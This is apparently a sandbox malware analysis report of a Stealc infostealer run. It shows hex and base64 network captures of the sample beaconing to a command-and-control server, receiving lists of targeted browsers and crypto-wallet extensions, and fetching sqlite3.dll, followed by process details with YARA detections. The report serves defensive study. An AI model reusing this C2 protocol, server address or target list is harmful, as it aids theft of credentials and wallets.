              Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 47 48 44 47 48 43 47 48 44 48 4a 4b 46 42 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 42 44 31 42 43 38 36 46 36 37 31 33 36 30 34 32 39 36 32 39 37 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 47 48 44 47 48 43 47 48 44 48 4a 4b 46 42 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6c 65 76 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 47 48 44 47 48 43 47 48 44 48 4a 4b 46 42 46 42 4b 2d 2d 0d 0a
              Data Ascii: ------JKEGHDGHCGHDHJKFBFBKContent-Disposition: form-data; name="hwid"7BD1BC86F6713604296297------JKEGHDGHCGHDHJKFBFBKContent-Disposition: form-data; name="build"leva------JKEGHDGHCGHDHJKFBFBK--
              Sep 1, 2024 23:02:55.694243908 CEST407INHTTP/1.1 200 OK
              Date: Sun, 01 Sep 2024 21:02:55 GMT
              Server: Apache/2.4.52 (Ubuntu)
              Vary: Accept-Encoding
              Content-Length: 180
              Keep-Alive: timeout=5, max=99
              Connection: Keep-Alive
              Content-Type: text/html; charset=UTF-8
              Data Raw: 4d 7a 59 34 4f 54 64 6b 4f 44 6b 32 4d 6a 5a 68 4e 54 67 7a 59 7a 45 77 4d 32 52 6c 4d 32 51 31 4f 54 63 30 59 6d 49 31 59 6d 45 79 4d 44 59 30 4d 6d 4e 6d 4d 54 4a 6b 4d 54 64 6b 4e 7a 49 7a 59 6a 59 77 4e 7a 51 35 4f 47 51 77 5a 54 6b 34 4e 6a 55 30 4d 6a 63 31 4d 32 45 34 4d 6a 63 31 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d
              Data Ascii: MzY4OTdkODk2MjZhNTgzYzEwM2RlM2Q1OTc0YmI1YmEyMDY0MmNmMTJkMTdkNzIzYjYwNzQ5OGQwZTk4NjU0Mjc1M2E4Mjc1fHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
              Sep 1, 2024 23:02:55.695233107 CEST470OUTPOST /e2b1563c6670f193.php HTTP/1.1
              Content-Type: multipart/form-data; boundary=----BAFCFBAEGDHIEBFHDGCB
              Host: 185.215.113.100
              Content-Length: 268
              Connection: Keep-Alive
              Cache-Control: no-cache
              Data Raw: 2d 2d 2d 2d 2d 2d 42 41 46 43 46 42 41 45 47 44 48 49 45 42 46 48 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 36 38 39 37 64 38 39 36 32 36 61 35 38 33 63 31 30 33 64 65 33 64 35 39 37 34 62 62 35 62 61 32 30 36 34 32 63 66 31 32 64 31 37 64 37 32 33 62 36 30 37 34 39 38 64 30 65 39 38 36 35 34 32 37 35 33 61 38 32 37 35 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 43 46 42 41 45 47 44 48 49 45 42 46 48 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 43 46 42 41 45 47 44 48 49 45 42 46 48 44 47 43 42 2d 2d 0d 0a
              Data Ascii: ------BAFCFBAEGDHIEBFHDGCBContent-Disposition: form-data; name="token"36897d89626a583c103de3d5974bb5ba20642cf12d17d723b607498d0e986542753a8275------BAFCFBAEGDHIEBFHDGCBContent-Disposition: form-data; name="message"browsers------BAFCFBAEGDHIEBFHDGCB--
              Sep 1, 2024 23:02:55.982058048 CEST1236INHTTP/1.1 200 OK
              Date: Sun, 01 Sep 2024 21:02:55 GMT
              Server: Apache/2.4.52 (Ubuntu)
              Vary: Accept-Encoding
              Content-Length: 1520
              Keep-Alive: timeout=5, max=98
              Connection: Keep-Alive
              Content-Type: text/html; charset=UTF-8
              Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED]
              Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
              Sep 1, 2024 23:02:55.982109070 CEST512INData Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32
              Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRml
              Sep 1, 2024 23:02:55.983489990 CEST469OUTPOST /e2b1563c6670f193.php HTTP/1.1
              Content-Type: multipart/form-data; boundary=----KKFCFBKFCFBFIDGCGDHJ
              Host: 185.215.113.100
              Content-Length: 267
              Connection: Keep-Alive
              Cache-Control: no-cache
              Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 46 43 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 36 38 39 37 64 38 39 36 32 36 61 35 38 33 63 31 30 33 64 65 33 64 35 39 37 34 62 62 35 62 61 32 30 36 34 32 63 66 31 32 64 31 37 64 37 32 33 62 36 30 37 34 39 38 64 30 65 39 38 36 35 34 32 37 35 33 61 38 32 37 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 43 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 43 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 2d 2d 0d 0a
              Data Ascii: ------KKFCFBKFCFBFIDGCGDHJContent-Disposition: form-data; name="token"36897d89626a583c103de3d5974bb5ba20642cf12d17d723b607498d0e986542753a8275------KKFCFBKFCFBFIDGCGDHJContent-Disposition: form-data; name="message"plugins------KKFCFBKFCFBFIDGCGDHJ--
              Sep 1, 2024 23:02:56.268379927 CEST1236INHTTP/1.1 200 OK
              Date: Sun, 01 Sep 2024 21:02:56 GMT
              Server: Apache/2.4.52 (Ubuntu)
              Vary: Accept-Encoding
              Content-Length: 7116
              Keep-Alive: timeout=5, max=97
              Connection: Keep-Alive
              Content-Type: text/html; charset=UTF-8
              Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED]
              Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
              Sep 1, 2024 23:02:56.268434048 CEST164INData Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46
              Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9n
              Sep 1, 2024 23:02:56.268445015 CEST1236INData Raw: 61 32 64 6a 5a 47 5a 6f 61 47 4a 6b 5a 47 4e 6e 61 47 46 6a 61 47 74 6c 61 6d 56 68 63 48 77 78 66 44 42 38 4d 48 78 54 62 32 78 73 5a 58 52 38 5a 6d 68 74 5a 6d 56 75 5a 47 64 6b 62 32 4e 74 59 32 4a 74 5a 6d 6c 72 5a 47 4e 76 5a 32 39 6d 63 47
              Data Ascii: a2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZHBkbWthYWtlam5oYWV8MXwwfDB8UG9seW1lc2ggV2FsbGV0fGpvamhmZW9lZGtwa2dsYmZpbWRmYWJwZGZ
              Sep 1, 2024 23:02:56.268512964 CEST1236INData Raw: 5a 47 70 6b 62 6d 35 76 61 6d 74 69 5a 32 6c 76 61 57 39 6b 59 6d 6c 6a 66 44 46 38 4d 48 77 77 66 45 4e 35 59 57 35 76 49 46 64 68 62 47 78 6c 64 48 78 6b 61 32 52 6c 5a 47 78 77 5a 32 52 74 62 57 74 72 5a 6d 70 68 59 6d 5a 6d 5a 57 64 68 62 6d
              Data Ascii: ZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramVofDF8MHwwfFRlbXBsZXxvb2tqbGJraWl
              Sep 1, 2024 23:02:56.268524885 CEST1236INData Raw: 63 79 42 58 59 57 78 73 5a 58 52 38 5a 57 5a 69 5a 32 78 6e 62 32 5a 76 61 58 42 77 59 6d 64 6a 61 6d 56 77 62 6d 68 70 59 6d 78 68 61 57 4a 6a 62 6d 4e 73 5a 32 74 38 4d 58 77 77 66 44 42 38 52 6d 6c 75 62 6d 6c 6c 66 47 4e 71 62 57 74 75 5a 47
              Data Ascii: cyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWtuZGpobmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFRyZXpvciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmt
              Sep 1, 2024 23:02:56.268534899 CEST672INData Raw: 59 6d 5a 69 62 6e 42 74 61 57 39 72 5a 6d 70 71 59 57 64 73 59 57 68 74 62 6d 52 6c 5a 48 77 78 66 44 42 38 4d 48 78 61 62 32 68 76 49 46 5a 68 64 57 78 30 66 47 6c 6e 61 33 42 6a 62 32 52 6f 61 57 56 76 62 58 42 6c 62 47 39 75 59 32 5a 75 59 6d
              Data Ascii: YmZibnBtaW9rZmpqYWdsYWhtbmRlZHwxfDB8MHxab2hvIFZhdWx0fGlna3Bjb2RoaWVvbXBlbG9uY2ZuYmVrY2NpbmhhcGRifDF8MHwwfE9wZXJhIFdhbGxldHxnb2poY2RnY3BicGZpZ2NhZWpwZmhmZWdla2RnaWJsa3wwfDB8MXxUcnVzdCBXYWxsZXR8ZWdqaWRqYnBnbGljaGRjb25kYmNiZG5iZWVwcGdkcGh8MXwwfDB
              Sep 1, 2024 23:02:56.269284964 CEST1236INData Raw: 4d 58 77 77 66 44 42 38 52 6e 4a 76 62 6e 52 70 5a 58 49 67 56 32 46 73 62 47 56 30 66 47 74 77 63 47 5a 6b 61 57 6c 77 63 47 68 6d 59 32 4e 6c 62 57 4e 70 5a 32 35 6f 61 57 5a 77 61 6d 74 68 63 47 5a 69 61 57 68 6b 66 44 46 38 4d 48 77 77 66 46
              Data Ascii: MXwwfDB8RnJvbnRpZXIgV2FsbGV0fGtwcGZkaWlwcGhmY2NlbWNpZ25oaWZwamthcGZiaWhkfDF8MHwwfFNhZmVQYWx8bGdtcGNwZ2xwbmdkb2FsYmdlb2xkZWFqZmNsbmhhZmF8MXwwfDB8U3ViV2FsbGV0IC0gUG9sa2Fkb3QgV2FsbGV0fG9uaG9nZmplYWNuZm9vZmtmZ3BwZGxibWxtbnBsZ2JufDF8MHwwfEZsdXZpIFd
              Sep 1, 2024 23:02:56.269296885 CEST328INData Raw: 59 6d 4a 77 62 57 68 70 61 47 56 6f 62 57 6c 6f 62 6d 52 74 62 57 4e 6b 59 57 35 68 59 32 39 73 62 6d 68 38 4d 58 77 77 66 44 42 38 51 6d 6c 30 5a 32 56 30 49 46 64 68 62 47 78 6c 64 48 78 71 61 57 6c 6b 61 57 46 68 62 47 6c 6f 62 57 31 6f 5a 47
              Data Ascii: YmJwbWhpaGVobWlobmRtbWNkYW5hY29sbmh8MXwwfDB8Qml0Z2V0IFdhbGxldHxqaWlkaWFhbGlobW1oZGRqZ2JuYmdkZmZsZWxvY3Bha3wxfDB8MHxUT04gV2FsbGV0fG5waHBscGdvYWtoaGpjaGtraG1pZ2dha2lqbmtoZm5kfDF8MHwwfE15VG9uV2FsbGV0fGZsZGZwZ2lwZm5jZ25kZm9sY2JrZGVla25iYmJuaGNjfDF
              Sep 1, 2024 23:02:56.270522118 CEST470OUTPOST /e2b1563c6670f193.php HTTP/1.1
              Content-Type: multipart/form-data; boundary=----FIEGCBKEGCFCBFIDBFII
              Host: 185.215.113.100
              Content-Length: 268
              Connection: Keep-Alive
              Cache-Control: no-cache
              Data Raw: 2d 2d 2d 2d 2d 2d 46 49 45 47 43 42 4b 45 47 43 46 43 42 46 49 44 42 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 36 38 39 37 64 38 39 36 32 36 61 35 38 33 63 31 30 33 64 65 33 64 35 39 37 34 62 62 35 62 61 32 30 36 34 32 63 66 31 32 64 31 37 64 37 32 33 62 36 30 37 34 39 38 64 30 65 39 38 36 35 34 32 37 35 33 61 38 32 37 35 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 47 43 42 4b 45 47 43 46 43 42 46 49 44 42 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 47 43 42 4b 45 47 43 46 43 42 46 49 44 42 46 49 49 2d 2d 0d 0a
              Data Ascii: ------FIEGCBKEGCFCBFIDBFIIContent-Disposition: form-data; name="token"36897d89626a583c103de3d5974bb5ba20642cf12d17d723b607498d0e986542753a8275------FIEGCBKEGCFCBFIDBFIIContent-Disposition: form-data; name="message"fplugins------FIEGCBKEGCFCBFIDBFII--
              Sep 1, 2024 23:02:57.316217899 CEST335INHTTP/1.1 200 OK
              Date: Sun, 01 Sep 2024 21:02:56 GMT
              Server: Apache/2.4.52 (Ubuntu)
              Vary: Accept-Encoding
              Content-Length: 108
              Keep-Alive: timeout=5, max=96
              Connection: Keep-Alive
              Content-Type: text/html; charset=UTF-8
              Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38
              Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
              Sep 1, 2024 23:02:57.331969023 CEST203OUTPOST /e2b1563c6670f193.php HTTP/1.1
              Content-Type: multipart/form-data; boundary=----IIDHJKFBGIIJJKFIJDBG
              Host: 185.215.113.100
              Content-Length: 5727
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 1, 2024 23:02:57.332015991 CEST5727OUTData Raw: 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 4b 46 42 47 49 49 4a 4a 4b 46 49 4a 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 36 38 39 37 64
              Data Ascii: ------IIDHJKFBGIIJJKFIJDBGContent-Disposition: form-data; name="token"36897d89626a583c103de3d5974bb5ba20642cf12d17d723b607498d0e986542753a8275------IIDHJKFBGIIJJKFIJDBGContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
              Sep 1, 2024 23:02:58.882740021 CEST202INHTTP/1.1 200 OK
              Date: Sun, 01 Sep 2024 21:02:57 GMT
              Server: Apache/2.4.52 (Ubuntu)
              Content-Length: 0
              Keep-Alive: timeout=5, max=95
              Connection: Keep-Alive
              Content-Type: text/html; charset=UTF-8
              Sep 1, 2024 23:02:59.155009985 CEST94OUTGET /0d60be0de163924d/sqlite3.dll HTTP/1.1
              Host: 185.215.113.100
              Cache-Control: no-cache
              Sep 1, 2024 23:02:59.442027092 CEST1236INHTTP/1.1 200 OK
              Date: Sun, 01 Sep 2024 21:02:59 GMT
              Server: Apache/2.4.52 (Ubuntu)
              Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT
              ETag: "10e436-5e7ec6832a180"
              Accept-Ranges: bytes
              Content-Length: 1106998
              Content-Type: application/x-msdos-program
              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: *0@< .text%&`P`.data|'@(,@`.rdatapDpFT@`@.bss(`.edata*,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
              Sep 1, 2024 23:02:59.442042112 CEST164INData Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00
              Data Ascii: #N@B/81s:<R@B/92P @B


              Click to jump to process

              Click to jump to process

              Click to dive into process behavior distribution

              Click to jump to process

              Target ID:0
              Start time:17:02:51
              Start date:01/09/2024
              Path:C:\Users\user\Desktop\file.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\file.exe"
              Imagebase:0x860000
              File size:1'830'912 bytes
              MD5 hash:69A44AFD5F25F695F1E1FE16ABF56A39
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2544618204.00000000008CA000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2545709966.000000000136E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              Reputation:low
              Has exited:true

              Target ID:6
              Start time:17:04:02
              Start date:01/09/2024
              Path:C:\Windows\SysWOW64\WerFault.exe
              Wow64 process (32bit):true
              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2800 -s 1544
              Imagebase:0xc10000
              File size:483'680 bytes
              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              No disassembly